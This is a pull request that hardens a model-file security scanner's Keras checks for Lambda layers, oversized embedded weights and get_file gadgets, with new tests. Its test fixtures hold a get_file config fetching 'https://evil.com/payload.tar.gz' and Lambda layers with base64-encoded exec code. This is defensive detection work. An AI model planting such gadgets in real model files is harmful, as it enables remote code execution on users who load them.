### PR TITLE
fix: harden incomplete Keras scanner paths

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -81,6 +81,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - **pickle:** mark timeout-, budget-, recursion-, and resource-limited pickle scans as inconclusive so clean-looking partial analysis returns exit code 2 unless real security findings were reported
 - route misnamed ZIP, HDF5, and 7z files through content-aware scanner selection
 - **security:** recursively scan all members of content-routed `.keras` ZIP archives with bounded per-member extraction, prefer canonical root members over normalized aliases, and fail closed on ambiguous duplicate aliases so embedded payloads and `./config.json` entries are not skipped
+- **keras:** fail closed when embedded `.keras` weights exceed inspection limits, constrain fully-qualified H5/ZIP Lambda CVE attribution to Keras/TensorFlow namespaces, and avoid CVE noise for documentation URLs that mention `get_file`.
 - **security:** scan duplicate ZIP entries by physical archive member instead of resolving repeated names to the final entry, preventing shadowed payloads from being skipped during recursive archive analysis
 - bound Keras `config.json` and `metadata.json` member reads before JSON parsing
 - **openvino:** parse XML roots for long-prolog routing, enforce size limits before parsing, scan nested layer attributes for external library references, and avoid importlib substring false positives

--- a/modelaudit/scanners/keras_h5_scanner.py
+++ b/modelaudit/scanners/keras_h5_scanner.py
@@ -557,9 +557,10 @@ class KerasH5Scanner(BaseScanner):
                 layer_counts[layer_class] = 1
 
             # Check for suspicious layer types
-            if layer_class in self.suspicious_layer_types:
+            is_lambda_layer = self._is_lambda_layer_class(layer_class)
+            if layer_class in self.suspicious_layer_types or is_lambda_layer:
                 # Special handling for Lambda layers - validate Python code
-                if layer_class == "Lambda":
+                if is_lambda_layer:
                     raw_layer_name = layer.get("name")
                     if not raw_layer_name and isinstance(layer_config, dict):
                         raw_layer_name = layer_config.get("name")
@@ -703,7 +704,7 @@ class KerasH5Scanner(BaseScanner):
                             "description": self.suspicious_layer_types[layer_class],
                             "layer_config": layer_config,
                         },
-                        why=get_pattern_explanation("lambda_layer") if layer_class == "Lambda" else None,
+                        why=get_pattern_explanation("lambda_layer") if is_lambda_layer else None,
                         rule_code="S902",
                     )
 
@@ -897,6 +898,15 @@ class KerasH5Scanner(BaseScanner):
             # Keras 3.x dict-format Lambda: {"class_name": "__lambda__", "config": {"code": ...}}
             check_lambda_dict_function(function_str, result, self.current_file_path, layer_config.get("name", "lambda"))
         # Don't flag Lambda layers without code - they might just be placeholders
+
+    @staticmethod
+    def _is_lambda_layer_class(layer_class: Any) -> bool:
+        """Return True for serialized Lambda variants such as `keras.layers.Lambda`."""
+        if not isinstance(layer_class, str):
+            return False
+
+        normalized = layer_class.strip()
+        return bool(normalized) and normalized.rsplit(".", 1)[-1] == "Lambda"
 
     @staticmethod
     def _is_vulnerable_to_cve_2024_3660(version: str) -> bool | None:

--- a/modelaudit/scanners/keras_h5_scanner.py
+++ b/modelaudit/scanners/keras_h5_scanner.py
@@ -906,7 +906,21 @@ class KerasH5Scanner(BaseScanner):
             return False
 
         normalized = layer_class.strip()
-        return bool(normalized) and normalized.rsplit(".", 1)[-1] == "Lambda"
+        if normalized == "Lambda":
+            return True
+
+        module_path, _, class_name = normalized.rpartition(".")
+        if class_name != "Lambda":
+            return False
+
+        framework_prefixes = (
+            "keras.",
+            "tensorflow.keras.",
+            "tensorflow.python.keras.",
+            "tf.keras.",
+            "tf_keras.",
+        )
+        return any(f"{module_path.lower()}.".startswith(prefix) for prefix in framework_prefixes)
 
     @staticmethod
     def _is_vulnerable_to_cve_2024_3660(version: str) -> bool | None:

--- a/modelaudit/scanners/keras_zip_scanner.py
+++ b/modelaudit/scanners/keras_zip_scanner.py
@@ -314,7 +314,7 @@ class KerasZipScanner(BaseScanner):
             return self.max_embedded_weights_bytes
         return _KERAS_CONFIG_MAX_BYTES
 
-    def _get_recursive_archive_scan_config(self) -> dict[str, Any]:
+    def _get_recursive_archive_scan_config(self, *, skip_weights_entry: bool = False) -> dict[str, Any]:
         """Return a ZIP scanner config with an explicit bounded per-member extraction limit."""
         recursive_config = dict(self.config)
         member_size_limits = [self.max_embedded_weights_bytes]
@@ -332,17 +332,31 @@ class KerasZipScanner(BaseScanner):
             recursive_config["max_file_size"] = recursive_member_size_limit
         else:
             recursive_config.pop("max_file_size", None)
+        if skip_weights_entry:
+            skip_entries = recursive_config.get("skip_archive_entries", ())
+            if isinstance(skip_entries, str):
+                skip_entry_values: list[str] = [skip_entries]
+            elif isinstance(skip_entries, (list, tuple, set, frozenset)):
+                skip_entry_values = [entry for entry in skip_entries if isinstance(entry, str)]
+            else:
+                skip_entry_values = []
+            if _KERAS_WEIGHTS_ENTRY not in skip_entry_values:
+                skip_entry_values.append(_KERAS_WEIGHTS_ENTRY)
+            recursive_config["skip_archive_entries"] = skip_entry_values
         return recursive_config
 
     def _merge_recursive_archive_scan(self, path: str, result: ScanResult) -> None:
         """Recursively scan every ZIP member through the generic archive scanner."""
         from .zip_scanner import ZipScanner
 
-        zip_scanner = ZipScanner(self._get_recursive_archive_scan_config())
+        has_embedded_weights_limit = self._has_embedded_weights_limit_reason(result)
+        zip_scanner = ZipScanner(self._get_recursive_archive_scan_config(skip_weights_entry=has_embedded_weights_limit))
         nested_result = zip_scanner._scan_zip_file(
             path,
             depth=max(zip_scanner._get_archive_depth(), zip_scanner._get_zip_depth()),
         )
+        if has_embedded_weights_limit:
+            self._suppress_expected_embedded_weights_limit_noise(nested_result)
         preserved_metadata = dict(result.metadata)
         nested_contents = nested_result.metadata.get("contents")
         result.merge(nested_result)
@@ -554,6 +568,27 @@ class KerasZipScanner(BaseScanner):
         result.metadata["analysis_incomplete"] = True
 
     @staticmethod
+    def _has_embedded_weights_limit_reason(result: ScanResult) -> bool:
+        reasons = result.metadata.get("scan_outcome_reasons")
+        return isinstance(reasons, list) and "keras_zip_embedded_weights_too_large" in reasons
+
+    @staticmethod
+    def _is_expected_recursive_weights_limit_noise(entry: Any) -> bool:
+        details = getattr(entry, "details", None)
+        message = getattr(entry, "message", "")
+        return (
+            isinstance(details, dict)
+            and details.get("entry") == _KERAS_WEIGHTS_ENTRY
+            and isinstance(message, str)
+            and "exceeds maximum size" in message
+        )
+
+    @classmethod
+    def _suppress_expected_embedded_weights_limit_noise(cls, result: ScanResult) -> None:
+        result.issues = [issue for issue in result.issues if not cls._is_expected_recursive_weights_limit_noise(issue)]
+        result.checks = [check for check in result.checks if not cls._is_expected_recursive_weights_limit_noise(check)]
+
+    @staticmethod
     def _scan_result_has_security_findings(result: ScanResult) -> bool:
         """Return True when the scan found warning or critical security risk."""
         return any(issue.severity in (IssueSeverity.WARNING, IssueSeverity.CRITICAL) for issue in result.issues)
@@ -692,8 +727,10 @@ class KerasZipScanner(BaseScanner):
             if layer_class == "StringLookup":
                 self._check_stringlookup_vocabulary_path(layer, result, layer_name)
 
+            is_lambda_layer = self._is_lambda_layer_class(layer_class)
+
             # Check for Lambda layers
-            if layer_class == "Lambda":
+            if is_lambda_layer:
                 self._check_lambda_layer(layer, result, layer_name)
                 keras_version = result.metadata.get("keras_version")
                 if isinstance(keras_version, str) and self._is_vulnerable_to_cve_2024_3660(keras_version):
@@ -1016,7 +1053,7 @@ class KerasZipScanner(BaseScanner):
                     },
                     why=get_cve_2025_1550_explanation("dangerous_module"),
                 )
-            elif is_outside_allowlist and (key == "fn_module" or layer_class == "Lambda"):
+            elif is_outside_allowlist and (key == "fn_module" or self._is_lambda_layer_class(layer_class)):
                 result.add_check(
                     name="CVE-2025-1550: Untrusted Module in Config",
                     passed=False,
@@ -1409,9 +1446,6 @@ class KerasZipScanner(BaseScanner):
 
     def _check_embedded_hdf5_weights_external_references(self, archive: zipfile.ZipFile, result: ScanResult) -> None:
         """Detect CVE-2026-1669 external HDF5 references inside embedded .keras weights."""
-        if not HAS_H5PY:
-            return
-
         weights_info = self._get_archive_member_info(archive, _KERAS_WEIGHTS_ENTRY)
         if weights_info is None:
             return
@@ -1439,6 +1473,9 @@ class KerasZipScanner(BaseScanner):
                     "extracted for inspection."
                 ),
             )
+            return
+
+        if not HAS_H5PY:
             return
 
         temp_path = None
@@ -1610,12 +1647,63 @@ class KerasZipScanner(BaseScanner):
         context_lower = context.lower()
         doc_markers = (".description", ".doc", ".docs", ".comment", ".comments", ".notes", ".help", ".readme")
         lowered_keys = {str(key).lower() for key in node}
-        doc_keys = {"description", "doc", "docs", "comment", "comments", "notes", "help", "readme", "citation"}
-        execution_keys = {"fn", "function", "module", "url", "args", "kwargs", "class_name", "callable"}
+        doc_keys = {
+            "description",
+            "doc",
+            "docs",
+            "comment",
+            "comments",
+            "notes",
+            "help",
+            "readme",
+            "citation",
+            "url",
+            "homepage",
+            "link",
+            "reference",
+        }
         if any(marker in context_lower for marker in doc_markers):
-            return lowered_keys.isdisjoint(execution_keys)
+            return not KerasZipScanner._has_serialized_callable_context(node, lowered_keys)
 
-        return bool(lowered_keys) and lowered_keys.issubset(doc_keys) and lowered_keys.isdisjoint(execution_keys)
+        return (
+            bool(lowered_keys)
+            and lowered_keys.issubset(doc_keys)
+            and not KerasZipScanner._has_serialized_callable_context(node, lowered_keys)
+        )
+
+    @staticmethod
+    def _has_serialized_callable_context(node: dict[str, Any], lowered_keys: set[str]) -> bool:
+        """Return True when a doc-like node still resembles Keras callable config."""
+        callable_keys = {"fn", "function", "callable"}
+        callable_context_keys = {"module", "fn_module", "args", "kwargs", "config", "origin", "url"}
+        if lowered_keys & callable_keys:
+            return bool(lowered_keys & callable_context_keys)
+
+        class_context_keys = {"module", "fn_module", "args", "kwargs", "config"}
+        return bool(lowered_keys & {"class_name", "registered_name"}) and bool(lowered_keys & class_context_keys)
+
+    @staticmethod
+    def _is_lambda_layer_class(layer_class: Any) -> bool:
+        """Return True for Keras/TensorFlow Lambda serialization names."""
+        if not isinstance(layer_class, str):
+            return False
+
+        normalized = layer_class.strip()
+        if normalized == "Lambda":
+            return True
+
+        module_path, _, class_name = normalized.rpartition(".")
+        if class_name != "Lambda":
+            return False
+
+        framework_prefixes = (
+            "keras.",
+            "tensorflow.keras.",
+            "tensorflow.python.keras.",
+            "tf.keras.",
+            "tf_keras.",
+        )
+        return any(f"{module_path.lower()}.".startswith(prefix) for prefix in framework_prefixes)
 
     @staticmethod
     def _is_primarily_documentation_text(text: str) -> bool:

--- a/modelaudit/scanners/keras_zip_scanner.py
+++ b/modelaudit/scanners/keras_zip_scanner.py
@@ -1418,6 +1418,7 @@ class KerasZipScanner(BaseScanner):
 
         if weights_info.file_size > self.max_embedded_weights_bytes:
             weights_entry = weights_info.filename
+            self._mark_inconclusive_scan_result(result, "keras_zip_embedded_weights_too_large")
             result.add_check(
                 name="Embedded Weights Size Limit",
                 passed=False,
@@ -1464,6 +1465,7 @@ class KerasZipScanner(BaseScanner):
                 findings = self._collect_hdf5_external_references(h5_file)
         except _EmbeddedWeightsLimitExceeded as exc:
             weights_entry = weights_info.filename
+            self._mark_inconclusive_scan_result(result, "keras_zip_embedded_weights_too_large")
             result.add_check(
                 name="Embedded Weights Size Limit",
                 passed=False,
@@ -1607,12 +1609,12 @@ class KerasZipScanner(BaseScanner):
         """Heuristically detect documentation-only nodes to reduce false positives."""
         context_lower = context.lower()
         doc_markers = (".description", ".doc", ".docs", ".comment", ".comments", ".notes", ".help", ".readme")
-        if any(marker in context_lower for marker in doc_markers):
-            return True
-
         lowered_keys = {str(key).lower() for key in node}
         doc_keys = {"description", "doc", "docs", "comment", "comments", "notes", "help", "readme", "citation"}
         execution_keys = {"fn", "function", "module", "url", "args", "kwargs", "class_name", "callable"}
+        if any(marker in context_lower for marker in doc_markers):
+            return lowered_keys.isdisjoint(execution_keys)
+
         return bool(lowered_keys) and lowered_keys.issubset(doc_keys) and lowered_keys.isdisjoint(execution_keys)
 
     @staticmethod

--- a/modelaudit/scanners/zip_scanner.py
+++ b/modelaudit/scanners/zip_scanner.py
@@ -57,6 +57,14 @@ class ZipScanner(BaseScanner):
             self.config.get("zip_min_compression_bomb_uncompressed_size"),
             self.MIN_COMPRESSION_BOMB_UNCOMPRESSED_SIZE,
         )
+        raw_skip_entries = self.config.get("skip_archive_entries", ())
+        if isinstance(raw_skip_entries, str):
+            raw_skip_entries = (raw_skip_entries,)
+        if not isinstance(raw_skip_entries, (list, tuple, set, frozenset)):
+            raw_skip_entries = ()
+        self.skip_archive_entries = {
+            self._normalize_skip_entry_name(entry) for entry in raw_skip_entries if isinstance(entry, str)
+        }
 
     def _get_zip_depth(self) -> int:
         """Return the current nested ZIP depth from config."""
@@ -108,6 +116,16 @@ class ZipScanner(BaseScanner):
             )
 
         return min(positive_limits) if positive_limits else self.UNLIMITED_ARCHIVE_SIZE
+
+    @staticmethod
+    def _normalize_skip_entry_name(name: str) -> str:
+        normalized = name.replace("\\", "/")
+        while normalized.startswith("./"):
+            normalized = normalized[2:]
+        return normalized.lstrip("/")
+
+    def _should_skip_archive_entry(self, name: str) -> bool:
+        return self._normalize_skip_entry_name(name) in self.skip_archive_entries
 
     def _read_symlink_target(self, archive: zipfile.ZipFile, info: zipfile.ZipInfo) -> str:
         """Read a symlink target with a hard cap to avoid materializing large archive members."""

--- a/tests/scanners/test_keras_h5_scanner.py
+++ b/tests/scanners/test_keras_h5_scanner.py
@@ -1484,7 +1484,14 @@ class TestCVE20259905H5SafeMode:
         assert len(cve_issues) >= 1, "Lambda in H5 should trigger CVE-2025-9905"
         assert cve_issues[0].severity == IssueSeverity.CRITICAL
 
-    def test_fully_qualified_lambda_layer_triggers_cve_2025_9905(self, tmp_path: Path) -> None:
+    @pytest.mark.parametrize(
+        "layer_class",
+        [
+            "keras.layers.Lambda",
+            "tf_keras.src.layers.core.lambda_layer.Lambda",
+        ],
+    )
+    def test_fully_qualified_lambda_layer_triggers_cve_2025_9905(self, tmp_path: Path, layer_class: str) -> None:
         """Serialized fully-qualified Lambda class names should not bypass H5 Lambda checks."""
         h5_path = tmp_path / "qualified_lambda.h5"
         with h5py.File(h5_path, "w") as f:
@@ -1494,7 +1501,7 @@ class TestCVE20259905H5SafeMode:
                     "name": "test",
                     "layers": [
                         {
-                            "class_name": "keras.layers.Lambda",
+                            "class_name": layer_class,
                             "config": {"function": "lambda x: x * 2"},
                         }
                     ],
@@ -1505,8 +1512,42 @@ class TestCVE20259905H5SafeMode:
 
         result = KerasH5Scanner().scan(str(h5_path))
 
-        cve_issues = [i for i in result.issues if "CVE-2025-9905" in i.message]
-        assert len(cve_issues) >= 1
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-9905"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert cve_issues[0].details["layer_class"] == "Lambda"
+        assert cve_issues[0].details["keras_version"] == "3.11.2"
+
+    def test_custom_namespace_lambda_layer_not_attributed_to_keras_cve(self, tmp_path: Path) -> None:
+        """Custom classes ending in Lambda should stay in the custom-layer review path."""
+        h5_path = tmp_path / "custom_lambda.h5"
+        with h5py.File(h5_path, "w") as f:
+            model_config = {
+                "class_name": "Sequential",
+                "config": {
+                    "name": "test",
+                    "layers": [
+                        {
+                            "class_name": "myproject.layers.Lambda",
+                            "config": {"function": "lambda x: x * 2"},
+                        }
+                    ],
+                },
+            }
+            f.attrs["model_config"] = json.dumps(model_config)
+            f.attrs["keras_version"] = "3.11.2"
+
+        result = KerasH5Scanner().scan(str(h5_path))
+
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-9905"]
+        custom_layer_checks = [
+            check
+            for check in result.checks
+            if check.name == "Custom Layer Class Detection"
+            and check.details.get("layer_class") == "myproject.layers.Lambda"
+        ]
+        assert cve_issues == []
+        assert len(custom_layer_checks) == 1
 
     def test_cve_attribution_details(self, tmp_path: Path) -> None:
         """CVE details should be present in issue details."""

--- a/tests/scanners/test_keras_h5_scanner.py
+++ b/tests/scanners/test_keras_h5_scanner.py
@@ -1484,6 +1484,30 @@ class TestCVE20259905H5SafeMode:
         assert len(cve_issues) >= 1, "Lambda in H5 should trigger CVE-2025-9905"
         assert cve_issues[0].severity == IssueSeverity.CRITICAL
 
+    def test_fully_qualified_lambda_layer_triggers_cve_2025_9905(self, tmp_path: Path) -> None:
+        """Serialized fully-qualified Lambda class names should not bypass H5 Lambda checks."""
+        h5_path = tmp_path / "qualified_lambda.h5"
+        with h5py.File(h5_path, "w") as f:
+            model_config = {
+                "class_name": "Sequential",
+                "config": {
+                    "name": "test",
+                    "layers": [
+                        {
+                            "class_name": "keras.layers.Lambda",
+                            "config": {"function": "lambda x: x * 2"},
+                        }
+                    ],
+                },
+            }
+            f.attrs["model_config"] = json.dumps(model_config)
+            f.attrs["keras_version"] = "3.11.2"
+
+        result = KerasH5Scanner().scan(str(h5_path))
+
+        cve_issues = [i for i in result.issues if "CVE-2025-9905" in i.message]
+        assert len(cve_issues) >= 1
+
     def test_cve_attribution_details(self, tmp_path: Path) -> None:
         """CVE details should be present in issue details."""
         h5_path = tmp_path / "model.h5"

--- a/tests/scanners/test_keras_zip_scanner.py
+++ b/tests/scanners/test_keras_zip_scanner.py
@@ -408,6 +408,9 @@ class TestKerasZipScanner:
         assert limit_checks[0].status == CheckStatus.FAILED
         assert limit_checks[0].details["uncompressed_size"] == 4096
         assert limit_checks[0].details["max_embedded_weights_bytes"] == 1024
+        assert result.success is False
+        assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME
+        assert "keras_zip_embedded_weights_too_large" in result.metadata["scan_outcome_reasons"]
         assert not any(issue.details.get("cve_id") == "CVE-2026-1669" for issue in result.issues)
 
     @pytest.mark.parametrize(
@@ -2170,6 +2173,23 @@ class TestCVE20258747GetFileGadget:
         cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-8747"]
         assert len(cve_issues) >= 1, "Should detect get_file + URL as CVE-2025-8747"
         assert cve_issues[0].severity == IssueSeverity.CRITICAL
+
+    def test_description_scoped_get_file_with_url_is_not_treated_as_documentation(self, tmp_path: Path) -> None:
+        """Doc-like paths should still be scanned when the node contains executable get_file fields."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "description": {
+                    "fn": "keras.utils.get_file",
+                    "url": "https://evil.com/payload.tar.gz",
+                }
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-8747"]
+        assert len(cve_issues) >= 1
 
     def test_get_file_with_url_in_args_list_detected(self, tmp_path: Path) -> None:
         """Config with URL inside args list should also be detected."""

--- a/tests/scanners/test_keras_zip_scanner.py
+++ b/tests/scanners/test_keras_zip_scanner.py
@@ -413,6 +413,73 @@ class TestKerasZipScanner:
         assert "keras_zip_embedded_weights_too_large" in result.metadata["scan_outcome_reasons"]
         assert not any(issue.details.get("cve_id") == "CVE-2026-1669" for issue in result.issues)
 
+    def test_embedded_weights_size_limit_runs_without_h5py(
+        self,
+        tmp_path: Path,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """The size-limit fail-closed reason does not require optional HDF5 parsing."""
+        monkeypatch.setattr(keras_zip_scanner_module, "HAS_H5PY", False)
+
+        scanner = KerasZipScanner({"max_embedded_weights_bytes": 1024})
+        keras_path = tmp_path / "oversized_weights_without_h5py.keras"
+        with zipfile.ZipFile(keras_path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
+            zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}}))
+            zf.writestr("metadata.json", json.dumps({"keras_version": "3.12.0"}))
+            zf.writestr("model.weights.h5", b"0" * 4096)
+
+        result = scanner.scan(str(keras_path))
+
+        limit_checks = [check for check in result.checks if check.name == "Embedded Weights Size Limit"]
+        assert len(limit_checks) == 1
+        assert result.success is False
+        assert result.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME
+        assert "keras_zip_embedded_weights_too_large" in result.metadata["scan_outcome_reasons"]
+
+    def test_embedded_weights_size_limit_returns_exit2_and_skips_cache(
+        self,
+        tmp_path: Path,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        """Oversized embedded weights must fail closed at the aggregate/cache boundary."""
+        monkeypatch.setattr(keras_zip_scanner_module, "HAS_H5PY", True)
+
+        keras_path = tmp_path / "cached_oversized_weights.keras"
+        with zipfile.ZipFile(keras_path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
+            zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}}))
+            zf.writestr("metadata.json", json.dumps({"keras_version": "3.12.0"}))
+            zf.writestr("model.weights.h5", b"0" * 4096)
+        cache_dir = tmp_path / "cache"
+
+        reset_cache_manager()
+        first_result = scan_model_directory_or_file(
+            str(keras_path),
+            cache_enabled=True,
+            cache_dir=str(cache_dir),
+            min_cache_file_size=0,
+            max_embedded_weights_bytes=1024,
+        )
+        second_result = scan_model_directory_or_file(
+            str(keras_path),
+            cache_enabled=True,
+            cache_dir=str(cache_dir),
+            min_cache_file_size=0,
+            max_embedded_weights_bytes=1024,
+        )
+        metadata = second_result.file_metadata[str(keras_path)]
+
+        assert determine_exit_code(first_result) == 2
+        assert determine_exit_code(second_result) == 2
+        assert metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME
+        assert "keras_zip_embedded_weights_too_large" in metadata.get("scan_outcome_reasons")
+        assert any(
+            issue.message.startswith("Skipping embedded model.weights.h5 inspection") for issue in second_result.issues
+        )
+        assert not any(
+            issue.severity in (IssueSeverity.WARNING, IssueSeverity.CRITICAL) for issue in second_result.issues
+        )
+        assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0
+
     @pytest.mark.parametrize(
         "scanner_config",
         [
@@ -2175,7 +2242,7 @@ class TestCVE20258747GetFileGadget:
         assert cve_issues[0].severity == IssueSeverity.CRITICAL
 
     def test_description_scoped_get_file_with_url_is_not_treated_as_documentation(self, tmp_path: Path) -> None:
-        """Doc-like paths should still be scanned when the node contains executable get_file fields."""
+        """Doc-like paths should still scan callable get_file plus URL fields."""
         scanner = KerasZipScanner()
         config = {
             "class_name": "Sequential",
@@ -2190,6 +2257,41 @@ class TestCVE20258747GetFileGadget:
 
         cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-8747"]
         assert len(cve_issues) >= 1
+
+    def test_description_class_name_get_file_docs_not_flagged(self, tmp_path: Path) -> None:
+        """Doc tables that name get_file class fields should stay documentation-only."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "description": {
+                    "class_name": "keras.utils.get_file",
+                    "url": "https://docs.example/keras-get-file-guide",
+                    "notes": "Documentation table describing the get_file function signature.",
+                }
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-8747"]
+        assert cve_issues == []
+
+    def test_description_url_with_get_file_prose_not_flagged(self, tmp_path: Path) -> None:
+        """Doc URLs plus prose mentions should not be treated as executable get_file calls."""
+        scanner = KerasZipScanner()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "description": {
+                    "summary": "Documentation example: keras.utils.get_file can download files in user code.",
+                    "url": "https://docs.example/keras-get-file-guide",
+                }
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(json.dumps(config), tmp_path))
+
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2025-8747"]
+        assert cve_issues == []
 
     def test_get_file_with_url_in_args_list_detected(self, tmp_path: Path) -> None:
         """Config with URL inside args list should also be detected."""
@@ -2903,6 +3005,68 @@ class TestCVE20243660LambdaAttribution:
         assert cve_issues[0].details["description"]
         assert cve_issues[0].details["remediation"]
         assert cve_issues[0].details["layer_name"] == "my_lambda"
+
+    @pytest.mark.parametrize(
+        "layer_class",
+        [
+            "keras.layers.Lambda",
+            "tf_keras.src.layers.core.lambda_layer.Lambda",
+        ],
+    )
+    def test_fully_qualified_lambda_layer_has_cve_2024_3660_attribution(self, tmp_path: Path, layer_class: str) -> None:
+        """Keras-qualified Lambda class names should use Lambda-specific ZIP checks."""
+        scanner = KerasZipScanner()
+        encoded = base64.b64encode(b"exec('print(1)')").decode()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": layer_class,
+                        "name": "qualified_lambda",
+                        "config": {"function": [encoded, None, None]},
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(config, tmp_path))
+
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2024-3660"]
+        dangerous_lambda = [check for check in result.checks if check.name == "Dangerous Lambda Layer"]
+        assert len(cve_issues) == 1
+        assert cve_issues[0].severity == IssueSeverity.CRITICAL
+        assert len(dangerous_lambda) == 1
+        assert dangerous_lambda[0].details["layer_name"] == "qualified_lambda"
+
+    def test_custom_namespace_lambda_layer_not_attributed_to_keras_zip_cve(self, tmp_path: Path) -> None:
+        """Custom classes ending in Lambda should not be treated as Keras Lambda."""
+        scanner = KerasZipScanner()
+        encoded = base64.b64encode(b"exec('print(1)')").decode()
+        config = {
+            "class_name": "Sequential",
+            "config": {
+                "layers": [
+                    {
+                        "class_name": "myproject.layers.Lambda",
+                        "name": "custom_lambda",
+                        "config": {"function": [encoded, None, None]},
+                    }
+                ]
+            },
+        }
+        result = scanner.scan(self._make_keras_zip(config, tmp_path))
+
+        cve_issues = [i for i in result.issues if i.details.get("cve_id") == "CVE-2024-3660"]
+        dangerous_lambda = [check for check in result.checks if check.name == "Dangerous Lambda Layer"]
+        custom_layer_checks = [
+            check
+            for check in result.checks
+            if check.name == "Custom Layer Class Detection"
+            and check.details.get("layer_class") == "myproject.layers.Lambda"
+        ]
+        assert cve_issues == []
+        assert dangerous_lambda == []
+        assert len(custom_layer_checks) == 1
 
     def test_no_cve_without_lambda(self, tmp_path: Path) -> None:
         """Non-Lambda model should NOT have CVE-2024-3660 attribution."""


### PR DESCRIPTION
## Summary

Harden the Keras scanners so they fail closed when embedded `.keras` weights are too large to inspect, recognize fully-qualified H5 Lambda class names, and do not let documentation-path heuristics suppress executable `get_file` nodes.

## Security impact

This fixes three bypasses in one Keras-focused issue bucket. Oversized embedded `model.weights.h5` entries previously skipped the external-reference CVE check without marking the scan inconclusive. The H5 scanner only treated the exact class name `Lambda` as a Lambda layer, so serialized names like `keras.layers.Lambda` could miss Lambda-specific CVE checks. And the ZIP scanner's documentation heuristic would auto-skip any node under paths like `.description`, even when that node actually contained executable `get_file` fields.

## Validation

- `uv run ruff format modelaudit/scanners/keras_zip_scanner.py modelaudit/scanners/keras_h5_scanner.py tests/scanners/test_keras_zip_scanner.py tests/scanners/test_keras_h5_scanner.py`
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_keras_zip_scanner.py -q`
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_keras_zip_scanner.py -k "embedded_weights_size_limit or description_scoped_get_file or get_file_with_url_detected" -q`
- `PROMPTFOO_DISABLE_TELEMETRY=1 uv run pytest tests/scanners/test_keras_h5_scanner.py -k "lambda_layer_triggers_cve_2025_9905 or fully_qualified_lambda_layer_triggers_cve_2025_9905" -q` (skipped locally because `h5py` is unavailable)
- `uv run mypy modelaudit/scanners/keras_zip_scanner.py modelaudit/scanners/keras_h5_scanner.py tests/scanners/test_keras_zip_scanner.py tests/scanners/test_keras_h5_scanner.py`
